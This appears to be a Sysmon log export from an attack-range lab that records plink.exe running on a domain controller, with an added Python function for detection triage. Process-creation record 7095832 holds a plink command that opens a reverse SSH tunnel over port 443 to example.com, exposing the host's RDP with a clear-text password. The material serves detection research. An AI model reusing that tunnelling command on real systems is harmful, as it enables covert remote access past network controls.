12241200x80000000000000007095900Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095899Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 
16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095898Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095897Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095895Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 12241200x80000000000000007095894Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-CreateKey2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters 734700x80000000000000007095893Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-622.attackrange.local-2022-09-15 16:39:08.088{D271FDA4-552C-6323-00FF-000000007402}5168C:\Users\Administrator\Downloads\plink.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft 
(tail of record 7096175, the image load of C:\Windows\System32\IPHLPAPI.DLL by PID 496 that begins above) OriginalFileName iphlpapi.dll; Hashes MD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728B; Signed true; Signature Microsoft Windows; SignatureStatus Valid

Common fields for every record below: Channel Microsoft-Windows-Sysmon/Operational; Computer win-dc-mhaag-attack-range-622.attackrange.local; Keywords 0x8000000000000000; Level 4; RuleName -; date 2022-09-15. Fields are laid out by Sysmon schema (schema version given per event type).

Event 7 (Image loaded), schema v3, records 7095892 down to 7095835. Image C:\Users\Administrator\Downloads\plink.exe, ProcessGuid {D271FDA4-552C-6323-00FF-000000007402}, ProcessId 5168. Unless noted: Product Microsoft® Windows® Operating System, Company Microsoft Corporation, Signed true, Signature Microsoft Windows, SignatureStatus Valid.

Record | UtcTime | ImageLoaded | FileVersion | Description | OriginalFileName | MD5 | SHA256
7095892 | 16:39:08.088 | C:\Windows\System32\nsi.dll | 10.0.14393.3297 (rs1_release_1.191001-1045) | NSI User-mode interface DLL | nsi.dll | 994E2A6D2A0B38E0968B3998E42033AC | 491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27
7095891 | 16:39:08.088 | C:\Windows\System32\dnsapi.dll | 10.0.14393.4350 (rs1_release.210407-2154) | DNS Client API DLL | dnsapi | D7651F99299B13D576A72643BFC44944 | 589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9
7095889 | 16:39:08.067 | C:\Windows\System32\shlwapi.dll | 10.0.14393.5125 (rs1_release.220429-1732) | Shell Light-weight Utility Library | SHLWAPI.DLL | 407E895A220DE1A60C5B555A113FE998 | FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92
7095864 | 16:39:08.067 | C:\Windows\System32\profapi.dll | 10.0.14393.0 (rs1_release.160715-1616) | User Profile Basic API | PROFAPI.DLL | 0BC84513575743DA177F3DFE18D35CA7 | C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899
7095863 | 16:39:08.067 | C:\Windows\System32\SHCore.dll | 10.0.14393.5066 (rs1_release.220401-1841) | SHCORE | SHCORE.dll | FC58D75DDAF44088B9101BE2418B1967 | 74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160
7095862 | 16:39:08.067 | C:\Windows\System32\kernel.appcore.dll | 10.0.14393.2312 (rs1_release.180607-1919) | AppModel API Host | kernel.appcore.dll | 0AF5EF8A7FEFD4B37036B71514FC20CF | D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C
7095860 | 16:39:08.067 | C:\Windows\System32\powrprof.dll | 10.0.14393.0 (rs1_release.160715-1616) | Power Profile Helper DLL | POWRPROF.DLL | C55F634054E45C0DEE47C254AE009928 | 76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575
7095859 | 16:39:08.067 | C:\Windows\System32\ucrtbase.dll | 10.0.14393.3659 (rs1_release_1.200410-1813) | Microsoft® C Runtime Library | ucrtbase.dll | 9804D130E8E7178738C2B9808091B427 | 6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3
7095858 | 16:39:08.067 | C:\Windows\System32\combase.dll | 10.0.14393.5192 (rs1_release.220610-1622) | Microsoft COM for Windows | COMBASE.DLL | 336FBB55FF4D4E5A05343A51C98A8F74 | FD42EBCB39DD4311FA7515010FF4D08AC4DFF7D5C35FCB23207833ED4C2E8444
7095857 | 16:39:08.067 | C:\Windows\System32\windows.storage.dll | 10.0.14393.5291 (rs1_release.220806-1444) | Microsoft WinRT Storage API | Windows.Storage.dll | AA86B65DCB0ECF7263B863DE2A4E8D00 | 2C4E0CA21438A610DCC55E24190146254E959DC5B8A0DE00BE517365CCCB10FB
7095856 | 16:39:08.067 | C:\Windows\System32\cfgmgr32.dll | 10.0.14393.0 (rs1_release.160715-1616) | Configuration Manager DLL | CFGMGR32.DLL | 77BF2979C1A08EBA43C24FE0B7E547BE | 071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704
7095855 | 16:39:08.067 | C:\Windows\System32\shell32.dll | 10.0.14393.5291 (rs1_release.220806-1444) | Windows Shell Common Dll | SHELL32.DLL | D73641916AB4964C7FE9B4A37473A01B | 4BB60581FB93D73CDC4F1FBEA2DDACE5D16FE61B6E0E16622C326B6E2F407A7E
7095854 | 16:39:08.067 | C:\Windows\System32\bcryptprimitives.dll | 10.0.14393.4770 (rs1_release.211101-1440) | Windows Cryptographic Primitives Library | bcryptprimitives.dll | 54417B63FB3760BC6DBC5DB1BDA4C272 | B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD
7095853 | 16:39:08.067 | C:\Windows\System32\cryptbase.dll | 10.0.14393.0 (rs1_release.160715-1616) | Base cryptographic API DLL | cryptbase.dll | 51FCB0FDEFCB9A3E4A1DC8C8673BC63C | 63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE
7095852 | 16:39:08.067 | C:\Windows\System32\bcrypt.dll | 10.0.14393.4583 (rs1_release.210730-1850) | Windows Cryptographic Primitives Library | bcrypt.dll | 63231EA984BC614584102A96D4F35CB4 | 13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74
7095851 | 16:39:08.067 | C:\Windows\System32\rsaenh.dll | 10.0.14393.4467 (rs1_release.210604-1844) | Microsoft Enhanced Cryptographic Provider | rsaenh.dll | 28140830C342F475A597B2D54C42DFFA | 99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862
7095850 | 16:39:08.067 | C:\Windows\System32\cryptsp.dll | 10.0.14393.2969 (rs1_release.190503-1820) | Cryptographic Service Provider API | cryptsp.dll | 9500AE4C4B639FEAEED0CC6C39F45149 | C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C
7095849 | 16:39:08.067 | C:\Windows\System32\ws2_32.dll | 10.0.14393.3241 (rs1_release_inmarket.190910-1801) | Windows Socket 2.0 32-Bit DLL | ws2_32.dll | 06E82905620845A7C185BDEE85CC4140 | B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0
7095848 | 16:39:08.067 | C:\Windows\System32\imm32.dll | 10.0.14393.0 (rs1_release.160715-1616) | Multi-User Windows IMM32 API Client DLL | imm32 | E1024CF2E35DD3467F52BC83F7FEDA3F | 59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A
7095847 | 16:39:08.067 | C:\Windows\System32\rpcrt4.dll | 10.0.14393.5291 (rs1_release.220806-1444) | Remote Procedure Call Runtime | rpcrt4.dll | F8550606B41FF309D9A1DC76BB4EE875 | A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EB
7095846 | 16:39:08.067 | C:\Windows\System32\sechost.dll | 10.0.14393.5006 (rs1_release.220301-1704) | Host for SCM/SDDL/LSA Lookup APIs | sechost.dll | 9F0F4C38A22FC9FFB8814F77A9563680 | E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166
7095845 | 16:39:08.067 | C:\Windows\System32\msvcrt.dll | 7.0.14393.2457 (rs1_release_inmarket.180822-1743) | Windows NT CRT DLL | msvcrt.dll | 0AF8989DD67A135B536CF948E3EFB7EB | C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4
7095844 | 16:39:08.067 | C:\Windows\System32\advapi32.dll | 10.0.14393.4886 (rs1_release.220104-1735) | Advanced Windows 32 Base API | advapi32.dll | C42106182CCA611F629E46981D1A0EEA | 68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE
7095843 | 16:39:08.067 | C:\Windows\System32\gdi32full.dll | 10.0.14393.5127 (rs1_release_inmarket.220514-1756) | GDI Client DLL | gdi32 | F284A98093B423946252259D7D2857D3 | 193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07
7095842 | 16:39:08.067 | C:\Windows\System32\gdi32.dll | 10.0.14393.4169 (rs1_release.210107-1130) | GDI Client DLL | gdi32 | 551D603CEC947F586DB9FADEF4D2EBA6 | 143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8
7095841 | 16:39:08.067 | C:\Windows\System32\win32u.dll | 10.0.14393.0 (rs1_release.160715-1616) | Win32u | Win32u.DLL | 6A40F9C63B52CB4E8271CF3418618033 | A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15
7095840 | 16:39:08.067 | C:\Windows\System32\user32.dll | 10.0.14393.4169 (rs1_release.210107-1130) | Multi-User Windows USER API Client DLL | user32 | 883B59C5557E8A9B3C1E1ED1CA48CD5A | 271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3
7095838 | 16:39:08.066 | C:\Windows\System32\KernelBase.dll | 10.0.14393.5246 (rs1_release.220701-1744) | Windows NT BASE API Client DLL | Kernelbase.dll | 96EFBE3DB6300BB13E0720809302FF9F | 2DE51A861E8D47D75730027E8BD70554363E10449EC258527C491EE8D4A57C2F
7095837 | 16:39:08.050 | C:\Windows\System32\kernel32.dll | 10.0.14393.5127 (rs1_release_inmarket.220514-1756) | Windows NT BASE API Client DLL | kernel32 | 92D599E644B89C0F9E7DDB55762EBEA6 | F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEE
7095836 | 16:39:08.050 | C:\Windows\System32\ntdll.dll | 10.0.14393.5006 (rs1_release.220301-1704) | NT Layer DLL | ntdll.dll | F5EE39B17A8BCDEDC3D40997C26F62B1 | 11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952
7095835 | 16:39:08.050 | C:\Users\Administrator\Downloads\plink.exe | Release 0.77 | Command-line SSH, Telnet, and Rlogin client | Plink | 41C8E38B48C792EF480A19B8A857CD36 | 653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA
Record 7095835 differs from the defaults: Product PuTTY suite, Company Simon Tatham, Signed true, Signature Simon Tatham, SignatureStatus Valid.

Record 7095865, Event 11 (File created), schema v2, UtcTime 16:39:08.083: ProcessGuid {D271FDA4-552C-6323-00FF-000000007402}; ProcessId 5168; Image C:\Users\Administrator\Downloads\plink.exe; TargetFilename C:\Users\Administrator\AppData\Local\PUTTY.RND; CreationUtcTime 2022-09-15 16:39:08.083

Record 7095839, Event 10 (Process accessed), schema v3, UtcTime 16:39:08.067: SourceProcessGUID {D271FDA4-5514-6323-F6FE-000000007402}; SourceProcessId 604; SourceThreadId 3876; SourceImage C:\Windows\system32\conhost.exe; TargetProcessGUID {D271FDA4-552C-6323-00FF-000000007402}; TargetProcessId 5168; TargetImage C:\Users\Administrator\Downloads\plink.exe; GrantedAccess 0x1fffff; CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

Record 7095834, Event 10 (Process accessed), schema v3, UtcTime 16:39:08.050: SourceProcessGUID {D271FDA4-6B85-631B-7001-000000007402}; SourceProcessId 4100; SourceThreadId 2724; SourceImage C:\Windows\system32\csrss.exe; TargetProcessGUID {D271FDA4-552C-6323-00FF-000000007402}; TargetProcessId 5168; TargetImage C:\Users\Administrator\Downloads\plink.exe; GrantedAccess 0x1fffff; CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
Common fields for every record below: Channel Microsoft-Windows-Sysmon/Operational; Computer win-dc-mhaag-attack-range-622.attackrange.local; Keywords 0x8000000000000000; Level 4; RuleName -.

Record 7095833, Event 10 (Process accessed), schema v3, UtcTime 2022-09-15 16:39:08.050: SourceProcessGUID {D271FDA4-5514-6323-F5FE-000000007402}; SourceProcessId 3996; SourceThreadId 1000; SourceImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; TargetProcessGUID {D271FDA4-552C-6323-00FF-000000007402}; TargetProcessId 5168; TargetImage C:\Users\Administrator\Downloads\plink.exe; GrantedAccess 0x1fffff.
CallTrace, with SYS standing for C:\Windows\assembly\NativeImages_v4.0.30319_64\System\5a48f1d1e4df1672621928dd2f021cd9\System.ni.dll and SMA for C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\2519526bcddad8872a47b75067fa6808\System.Management.Automation.ni.dll:
C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|SYS+383fe6|SYS+2c4809|SYS+2c4179|SMA+b4e00467(wow64)|SMA+b42834d0(wow64)|SMA+b428310b(wow64)|SMA+b4d4b829(wow64)|SMA+b424007d(wow64)|SMA+b42a3aef(wow64)|SMA+b4285afe(wow64)|SMA+b4285afe(wow64)|SMA+b428598f(wow64)|SMA+b42766af(wow64)|SMA+b4283bf1(wow64)|SMA+b4283763(wow64)|SMA+b42834d0(wow64)|SMA+b428310b(wow64)|SMA+b4d4b829(wow64)|SMA+b42683b6(wow64)|SMA+b4267928(wow64)

Record 7095832, Event 1 (Process creation), schema v5, UtcTime 2022-09-15 16:39:08.063:
ProcessGuid {D271FDA4-552C-6323-00FF-000000007402}; ProcessId 5168; Image C:\Users\Administrator\Downloads\plink.exe
FileVersion Release 0.77; Description Command-line SSH, Telnet, and Rlogin client; Product PuTTY suite; Company Simon Tatham; OriginalFileName Plink
CommandLine "C:\Users\Administrator\Downloads\plink.exe" -ssh -P 443 -l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.com
CurrentDirectory C:\Users\Administrator\Downloads\
User ATTACKRANGE\Administrator; LogonGuid {D271FDA4-6B87-631B-16FE-1C0000000000}; LogonId and TerminalSessionId run together in the export as 0x1cfe162 (read as LogonId 0x1cfe16, session 2); IntegrityLevel High
Hashes MD5=41C8E38B48C792EF480A19B8A857CD36,SHA256=653EDDE8520F10019C571F25AD6E61147C06EEECCC7639F69D61D1375CC71EAA
ParentProcessGuid {D271FDA4-5514-6323-F5FE-000000007402}; ParentProcessId 3996; ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; ParentCommandLine "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

Records 7090946 down to 7090937, Event 13 (Registry value set), schema v2, EventType SetValue, UtcTime 2022-09-15 16:35:43.592: ProcessGuid {D271FDA4-675B-631B-1400-000000007402}; ProcessId 1036; Image C:\Windows\System32\svchost.exe. TargetObject is the value name below under \REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\ (the Amcache application-file inventory entry for plink.exe, written from the earlier run at 16:35:41).

Record | Value | Details
7090946 | Usn | QWORD (0x00000000-0x1383ac60)
7090945 | Language | DWORD (0x00000809)
7090944 | Size | QWORD (0x00000000-0x000d1930)
7090943 | AppxPackageRelativeId | (Empty)
7090942 | AppxPackageFullName | (Empty)
7090941 | BinProductVersion | 0.77.0.0
7090940 | LinkDate | 05/24/2022 17:02:00
7090939 | ProductVersion | release 0.77
7090938 | ProductName | putty suite
7090937 | BinaryType | pe64_amd64
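The process-creation record above (7095832) carries the whole technique in one CommandLine field: plink opens an SSH session to example.com on port 443, asks the server to listen on example.com:443 and relay that listener back to 127.0.0.1:3389, so this host's RDP becomes reachable through an outbound connection that looks like HTTPS, and the password travels in clear on the command line. What follows is an added example, not code from the attack_data export and not PuTTY code: a Python triage function that splits that CommandLine the way Windows does, walks plink's options and reports those three facts. The option table, the port list and the helper names are this example's own choices; the two input lines are constructed, the first copied from the record above and the second a made-up benign invocation for contrast.

```python
"""Triage a plink.exe command line taken from a Sysmon Event ID 1 record.

Added example: not code from the attack_data export above and not PuTTY code.
The option table, the port list and the helper names are this example's own.
"""
import shlex
from dataclasses import dataclass, field
from typing import List, Optional

# plink options that consume the following argument (a subset of plink's set).
VALUE_OPTS = {"-P", "-l", "-pw", "-pwfile", "-R", "-L", "-D", "-i", "-m",
              "-hostkey", "-proxycmd", "-nc", "-sshlog", "-sshrawlog"}

# Services an intruder typically exposes through a reverse tunnel.
SENSITIVE_PORTS = {22: "SSH", 135: "RPC", 139: "NetBIOS", 445: "SMB",
                   1433: "MSSQL", 3389: "RDP", 5985: "WinRM", 5986: "WinRM over TLS"}


@dataclass
class ReverseForward:
    listen_addr: Optional[str]  # bind address on the SSH server; None = server default
    listen_port: int            # port the SSH server opens
    dest_host: str              # destination, resolved from the plink host
    dest_port: int


@dataclass
class PlinkTriage:
    image: str
    host: Optional[str] = None
    ssh_port: int = 22
    login: Optional[str] = None
    password_on_cmdline: bool = False
    reverse_forwards: List[ReverseForward] = field(default_factory=list)
    findings: List[str] = field(default_factory=list)


def split_windows_cmdline(cmdline: str) -> List[str]:
    """Honour double quotes but keep backslashes literal (posix=False), as
    Windows does; then drop the quotes around each token."""
    return [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]


def parse_reverse_forward(spec: str) -> ReverseForward:
    """Parse plink's -R argument: [listen-addr:]listen-port:dest-host:dest-port."""
    parts = spec.split(":")
    if len(parts) == 3:
        listen_addr, (listen_port, dest_host, dest_port) = None, parts
    elif len(parts) == 4:
        listen_addr, listen_port, dest_host, dest_port = parts
    else:
        raise ValueError(f"unsupported -R spec (IPv6 literals not handled): {spec!r}")
    return ReverseForward(listen_addr, int(listen_port), dest_host, int(dest_port))


def triage_plink(cmdline: str) -> PlinkTriage:
    """Walk the argument vector and report tunnel, port and credential facts."""
    argv = split_windows_cmdline(cmdline)
    t = PlinkTriage(image=argv[0])
    i = 1
    while i < len(argv):
        arg = argv[i]
        if arg in VALUE_OPTS:
            val = argv[i + 1] if i + 1 < len(argv) else ""
            if arg == "-P":
                t.ssh_port = int(val)
            elif arg == "-l":
                t.login = val
            elif arg == "-pw":
                t.password_on_cmdline = True
            elif arg == "-R":
                t.reverse_forwards.append(parse_reverse_forward(val))
            i += 2
        elif arg.startswith("-"):
            i += 1                      # valueless flag: -ssh, -N, -batch, ...
        else:
            if t.host is None:          # first positional token is [user@]host;
                if "@" in arg and t.login is None:   # later ones are the remote command
                    t.login, arg = arg.split("@", 1)
                t.host = arg
            i += 1

    for rf in t.reverse_forwards:
        svc = SENSITIVE_PORTS.get(rf.dest_port, "unlisted service")
        listen = f"{rf.listen_addr or '<server default>'}:{rf.listen_port}"
        t.findings.append(f"reverse tunnel: {listen} on SSH server {t.host} is relayed "
                          f"to {rf.dest_host}:{rf.dest_port} ({svc}) as seen from this host")
    if t.ssh_port != 22:
        t.findings.append(f"SSH client connects to port {t.ssh_port} instead of 22")
    if t.password_on_cmdline:
        t.findings.append("password passed with -pw; it is preserved in CommandLine")
    return t


# Constructed inputs: the first is the CommandLine field of record 7095832
# above, the second a made-up benign invocation for contrast.
SAMPLE_TUNNEL = ('"C:\\Users\\Administrator\\Downloads\\plink.exe" -ssh -P 443 '
                 '-l admin1 -pw 2323534647 -R example.com:443:127.0.0.1:3389 example.com')
SAMPLE_BENIGN = '"C:\\Program Files\\PuTTY\\plink.exe" -ssh -i C:\\keys\\ops.ppk ops@jump.internal uptime'

if __name__ == "__main__":
    for line in (SAMPLE_TUNNEL, SAMPLE_BENIGN):
        result = triage_plink(line)
        print(f"{result.image} -> {result.host}:{result.ssh_port}")
        for finding in result.findings:
            print("  !", finding)
```

Running it prints the three findings for the tunnel line and nothing for the benign one. The triage keys on Event 1 deliberately: the Event 10 records around it, in which powershell.exe, csrss.exe and conhost.exe open the new process with 0x1fffff, are what ordinary process creation looks like on Windows (the parent, the Win32 subsystem and the console host each take a handle), so they carry no signal on their own, while the -R argument, the port and the -pw flag do.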
Common fields for every record below: Channel Microsoft-Windows-Sysmon/Operational; Computer win-dc-mhaag-attack-range-622.attackrange.local; Keywords 0x8000000000000000; Level 4; RuleName -; date 2022-09-15.

Records 7090936 down to 7090928, Event 13 (Registry value set), schema v2, EventType SetValue, UtcTime 16:35:43.592: ProcessGuid {D271FDA4-675B-631B-1400-000000007402}; ProcessId 1036; Image C:\Windows\System32\svchost.exe. TargetObject is the value name below under \REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16\.

Record | Value | Details
7090936 | BinFileVersion | 0.77.0.0
7090935 | Version | release 0.77
7090934 | Publisher | simon tatham
7090933 | OriginalFileName | plink
7090932 | Name | plink.exe
7090931 | LongPathHash | plink.exe|c7ee6b7bcfc85c16
7090930 | LowerCaseLongPath | c:\users\administrator\downloads\plink.exe
7090929 | FileId | 000019856efed997df9d56720a930d4b0e12e4a8cdd7
7090928 | ProgramId | 0006d6b500aaa7acd35f6039dc14d79bc10d00000908

Record 7090927, Event 12 (Registry object added), schema v2, EventType CreateKey, UtcTime 16:35:43.592: ProcessGuid {D271FDA4-675B-631B-1400-000000007402}; ProcessId 1036; Image C:\Windows\System32\svchost.exe; TargetObject \REGISTRY\A\{c665152d-531a-c145-47fe-8d6cac18f589}\Root\InventoryApplicationFile\plink.exe|c7ee6b7bcfc85c16

Record 7090910, Event 13 (Registry value set), schema v2, EventType SetValue, UtcTime 16:35:43.576: ProcessGuid {D271FDA4-675B-631B-1400-000000007402}; ProcessId 1036; Image C:\Windows\System32\svchost.exe; TargetObject HKU\S-1-5-21-2251518177-1696790515-3014453336-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Users\Administrator\Downloads\plink.exe; Details Binary Data

Record 7090889, Event 5 (Process terminated), schema v3, UtcTime 16:35:41.558: ProcessGuid {D271FDA4-545D-6323-DDFE-000000007402}; ProcessId 5468; Image C:\Users\Administrator\Downloads\plink.exe

Event 7 (Image loaded), schema v3, records 7090888 down to 7090878. Image C:\Users\Administrator\Downloads\plink.exe, ProcessGuid {D271FDA4-545D-6323-DDFE-000000007402}, ProcessId 5468 (the earlier instance, started from explorer.exe). All rows: Product Microsoft® Windows® Operating System, Company Microsoft Corporation, Signed true, Signature Microsoft Windows, SignatureStatus Valid.

Record | UtcTime | ImageLoaded | FileVersion | Description | OriginalFileName | MD5 | SHA256
7090888 | 16:35:41.558 | C:\Windows\System32\kernel.appcore.dll | 10.0.14393.2312 (rs1_release.180607-1919) | AppModel API Host | kernel.appcore.dll | 0AF5EF8A7FEFD4B37036B71514FC20CF | D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C
7090887 | 16:35:41.531 | C:\Windows\System32\imm32.dll | 10.0.14393.0 (rs1_release.160715-1616) | Multi-User Windows IMM32 API Client DLL | imm32 | E1024CF2E35DD3467F52BC83F7FEDA3F | 59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A
7090886 | 16:35:41.527 | C:\Windows\System32\rpcrt4.dll | 10.0.14393.5291 (rs1_release.220806-1444) | Remote Procedure Call Runtime | rpcrt4.dll | F8550606B41FF309D9A1DC76BB4EE875 | A1FFDD6A2EDA9E0CF047C74B00649A2EA228E3B8BDE1761C66879FA40335C2EB
7090885 | 16:35:41.527 | C:\Windows\System32\sechost.dll | 10.0.14393.5006 (rs1_release.220301-1704) | Host for SCM/SDDL/LSA Lookup APIs | sechost.dll | 9F0F4C38A22FC9FFB8814F77A9563680 | E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166
7090884 | 16:35:41.527 | C:\Windows\System32\msvcrt.dll | 7.0.14393.2457 (rs1_release_inmarket.180822-1743) | Windows NT CRT DLL | msvcrt.dll | 0AF8989DD67A135B536CF948E3EFB7EB | C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4
7090883 | 16:35:41.526 | C:\Windows\System32\advapi32.dll | 10.0.14393.4886 (rs1_release.220104-1735) | Advanced Windows 32 Base API | advapi32.dll | C42106182CCA611F629E46981D1A0EEA | 68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE
7090882 | 16:35:41.526 | C:\Windows\System32\gdi32full.dll | 10.0.14393.5127 (rs1_release_inmarket.220514-1756) | GDI Client DLL | gdi32 | F284A98093B423946252259D7D2857D3 | 193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07
7090881 | 16:35:41.525 | C:\Windows\System32\gdi32.dll | 10.0.14393.4169 (rs1_release.210107-1130) | GDI Client DLL | gdi32 | 551D603CEC947F586DB9FADEF4D2EBA6 | 143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8
7090880 | 16:35:41.525 | C:\Windows\System32\win32u.dll | 10.0.14393.0 (rs1_release.160715-1616) | Win32u | Win32u.DLL | 6A40F9C63B52CB4E8271CF3418618033 | A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15
7090879 | 16:35:41.525 | C:\Windows\System32\user32.dll | 10.0.14393.4169 (rs1_release.210107-1130) | Multi-User Windows USER API Client DLL | user32 | 883B59C5557E8A9B3C1E1ED1CA48CD5A | 271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3
7090878 | 16:35:41.523 | C:\Windows\System32\apphelp.dll | 10.0.14393.4350 (rs1_release.210407-2154) | Application Compatibility Client Library | Apphelp | 92330FA0551BFFBB8C1C97E86F9A0264 | 0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117

Event 10 (Process accessed), schema v3, records 7090875 down to 7090865: SourceProcess GUID {D271FDA4-6971-631F-537A-000000007402}; SourceProcessId 6716; SourceImage C:\Windows\explorer.exe; TargetProcessGUID {D271FDA4-545D-6323-DDFE-000000007402}; TargetProcessId 5468; TargetImage C:\Users\Administrator\Downloads\plink.exe.

Record 7090875, UtcTime 16:35:41.504, SourceThreadId 4516, GrantedAccess 0x1410, CallTrace C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+c9fdf|C:\Windows\System32\SHELL32.dll+cab85|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13becf|C:\Windows\System32\windows.storage.dll+13ac5b|C:\Windows\System32\windows.storage.dll+13917f|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

